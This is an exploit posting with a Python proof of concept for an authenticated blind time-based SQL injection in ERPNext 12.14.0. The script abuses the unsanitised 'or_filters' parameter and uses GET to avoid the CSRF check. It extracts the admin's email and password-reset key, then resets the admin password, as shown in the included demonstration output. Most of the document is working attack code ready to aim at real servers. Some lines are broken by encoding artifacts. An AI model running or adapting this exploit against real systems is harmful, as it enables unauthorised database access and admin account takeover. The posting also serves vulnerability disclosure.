Authored by Hodorsec

ERPNext version 12.14.0 suffers from an authenticated remote SQL injection vulnerability.

# Exploit Title: ERPNext 12.14.0 - SQL Injection (Authenticated)
# Date: 21-01-21
# Exploit Author: Hodorsec
# Vendor Homepage: http://erpnext.org
# Software Link: https://erpnext.org/download
# Version: 12.14.0
# Tested on: Ubuntu 18.04

#!/usr/bin/python3

# AUTHENTICATED SQL INJECTION VULNERABILITY
# In short:
# Found an authenticated SQL injection when authenticated as a low-privileged user as the parameters "or_filter" and "filters" are not being sanitized sufficiently. Although several sanitation and blacklist attempts are used in the code for other parameters, these parameters aren't checked. This allows, for example, a retrieval of the admin reset token and reset the admin account using a new password as being shown in the PoC.
#
# Longer story:
# Via the "frappe.model.db_query.get_list" CMD method, it's possible to abuse the "or_filters" parameter to successfully exploit a blind time-based SQL injection using an array/list as parameter using '["{QUERY}"]', where {QUERY} is any unfiltered SQL query.
# The "or_filters" parameter is used as part of the SELECT query, along with parameters "fields", "order_by", "group_by" and "limit". When entering any subselect in the "or_filters" or "filters" parameter, no checks are being made if any blacklisted word is being used.
# Initially, the requests where performed using the HTTP POST method which checks for a CSRF token. However, converting the request to an HTTP GET method, the CSRF token isn't required nor checked.
# Test environment:
# Tested against the latest development OVA v12 and updated using 'bench update', which leads to Frappe / ERPNext version v12.14.0.
# Cause:
# In "apps/frappe/frappe/model/db_query.py" the HTTP parameters "filters" and "or_filters" aren't being sanitized sufficiently.

# STEPS NOT INCLUDED IN SCRIPT DUE TO MAILSERVER DEPENDENCY
# 1. Create account
# 1.a. Use update-password link for created user received via mail
# STEPS INCLUDED IN SCRIPT
# 1. Login using existing low-privileged account
# 2. Use SQL Injection vulnerability in "frappe/frappe/nodel/db_query/get_list" function by not sanitizing parameters "filters" and "or_filters" sufficiently
# 3. Retrieve reset key for admin user
# 4. Reset admin account using given password

# DEMONSTRATION
# $ python3 poc_erpnext_12.14.0_auth_sqli_v1.0.py [email protected] passpass1234@ admin password123411111 http://192.168.252.8/ 2
# [*] Got an authenticated session, continue to perform SQL injection...
# [*] Retrieving 1 row of data using username 'admin' column 'name' and 'tabUser' as table...
# [email protected]
# [*] Retrieved value '[email protected]' for username 'admin' column 'name' in row 1
# [*] Sent reset request for '[email protected]
# [*] Retrieving 1 row of data using username 'admin' column 'reset_password_key' and 'tabUser' as table...
# xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX
# [*] Retrieved value 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' for username 'admin' column 'reset_password_key' in row 1
# [+] Retrieved email '[email protected]' and reset key 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX'
# [+} RESETTED ACCOUNT '[email protected]' WITH NEW PASSWORD 'password123=411111!
#
# [+] Done!

import requests
import urllib3
import os
import sys
import re

# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
os.environ['http_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy

# Disable cert warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Set timeout
timeout = 30

# Injection prefix and suffix
inj_prefix = "["select(sleep("
inj_suffix = "))))"]"

# Decimal begin and end
dec_begin = 48
dec_end = 57

# ASCII char begin and end
ascii_begin = 32
ascii_end = 126

# Handle CTRL-C
def keyboard_interrupt():
"""Handles keyboardinterrupt exceptions"""
print("nn[*] User requested an interrupt, exiting...")
exit(0)

# Custom headers
def http_headers():
headers = {
'User-Agent': "Mozilla",
}
return headers

# Get an authenticated session

def get_session(url,headers,email,password):
data = {'cmd':'login',
'usr':email,
'pwd':password,
'device':'desktop'}
session = requests.session()
r = session.post(url,headers=headers,data=data,timeout=timeout,=
allow_redirects=True,verify=False)
if "full_name" in r.text:
return session
else:
print("[!] Unable to get an authenticated session, check credentials...")
exit(-1)

# Perform the SQLi call for injection
def sqli(url,session,headers,inj_str,sleep):
comment_inj_str = re.sub(" ","+",inj_str)
inj_params = {'cmd':'frappe.model.db_query.get_list',
'filters':'["idx=1"]',
'or_filters':inj_str,
'fields':'idx',
'doctype':'Report',
'order_by':'idx',
'group_by':'idx'}

# inj_params[param] = comment_inj_str
inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_para=
ms.items())
=20
# Do GET
r = session.get(url,params=inj_params,headers=headers,timeout=t=
imeout,verify=False)
res = r.elapsed.total_seconds()
if res >= sleep:
return True
elif res < sleep:
return False
else:
print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
exit(-1)

# Loop through positions and characters
def get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep):
extracted = ""
max_pos_len = 35
# Loop through length of string
# Not very efficient, should use a guessing algorithm
for pos in range(1,max_pos_len):
# Test if current pos does have any valid value. If not, break
direction = ">"
inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" =
+ direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + suffix
if not sqli(url,session,headers,inj_str,sleep):
break
# Loop through ASCII printable characters
direction = "="
for guess in range(ascii_begin,ascii_end+1):
extracted_char = chr(guess)
inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + suffix
if sqli(url,session,headers,inj_str,sleep):
extracted += chr(guess)
print(extracted_char,end='',flush=True)
break
return extracted


def forgot_password(url,headers,sqli_email):
data = {'cmd':'frappe.core.doctype.user.user.reset_password',
'user':sqli_email}
r = requests.post(url,headers=headers,data=data,verify=False,al=
low_redirects=False,timeout=timeout)
if "Password reset instructions have been sent to your email" in r.text=
:
return r

def reset_account(url,headers,sqli_email,sqli_reset_key,new_password):
data = {'key':sqli_reset_key,
'old_password':'',
'new_password':new_password,
'logout_all_sessions':'0',
'cmd':'frappe.core.doctype.user.user.update_password'}
r = requests.post(url,headers=headers,data=data,verify=False,al=
low_redirects=False,timeout=timeout)
if r.status_code == 200:
return r

# Main
def main(argv):
if len(sys.argv) == 7:
email = sys.argv[1]
password = sys.argv[2]
username = sys.argv[3]
new_password = sys.argv[4]
url = sys.argv[5]
sleep = int(sys.argv[6])
else:
print("[*] Usage: " + sys.argv[0] + " <email_login> <passw_login> <username_to_reset> <new_password> <url> <sleep_in_seconds>")
print("[*] Example: " + sys.argv[0] + " [email protected] passpass1234@ admin password1234@ http://192.168.252.8/ 2n")
exit(0)

# Random headers
headers = http_headers()

# Sleep divide by 2 due to timing caused by specific DBMS query
sleep = sleep / 2

# Optional prefix / suffix
prefix = ""
suffix = ""

# Tables / columns / values
table = 'tabUser'
columns = ['name','reset_password_key']
sqli_email = ""
sqli_reset_key = ""

# Rows
rows = 1

# Do stuff
try:
# Get an authenticated session
session = get_session(url,headers,email,password)
if session:
print("[*] Got an authenticated session, continue to perform SQL injection...")
=20
# Getting values for found rows in specified columns
for column in columns:
print("[*] Retrieving " + str(rows) + " row of data using username '" + username + "' column '" + column + "' and '" + table + "' as table...")
for row in range(0,rows):
retrieved = get_data(url,session,headers,prefix,suffix,ro=
w,column,table,username,sleep)
print("n[*] Retrieved value '" + retrieved + "' for username '" + username + "' column '" + column + "' in row " + str(row+1))
if column == 'name':
sqli_email = retrieved
# Generate a reset token in database
if forgot_password(url,headers,sqli_email):
print("[*] Sent reset request for '" + sqli_email + "'"=
)
else:
print("[!] Something went wrong sending a reset request, check requests or listening mail server...")
exit(-1)
elif column == 'reset_password_key':
sqli_reset_key = retrieved

# Print retrieved values
print("[+] Retrieved email '" + sqli_email + "' and reset key '" + =
sqli_reset_key + "'")

# Reset the desired account
if reset_account(url,headers,sqli_email,sqli_reset_key,new_password=
):
print("[+} RESETTED ACCOUNT '" + sqli_email + "' WITH NEW PASSWORD '" + new_password + "'")
else:
print("[!] Something went wrong when attempting to reset account, check requests: perhaps password not complex enough?")
exit(-1)
=20
# Done
print("n[+] Done!n")
except requests.exceptions.Timeout:
print("[!] Timeout errorn")
exit(-1)
except requests.exceptions.TooManyRedirects:
print("[!] Too many redirectsn")
exit(-1)
except requests.exceptions.ConnectionError:
print("[!] Not able to connect to URLn")
exit(-1)
except requests.exceptions.RequestException as e:
print("[!] " + str(e))
exit(-1)
except requests.exceptions.HTTPError as e:
print("[!] Failed with error code - " + str(e.code) + "n")
exit(-1)
except KeyboardInterrupt:
keyboard_interrupt()
exit(-1)

# If we were called as a program, go execute the main function.
if __name__ == "__main__":
main(sys.argv[1:])

# Timeline:
# 22-12-20: Sent initial description and PoC via https://erpnext.com/security
# 08-01-21: No reply nor response received, sent reminder via same form. Sent Twitter notifications.
# 21-01-21: No response received, public disclosure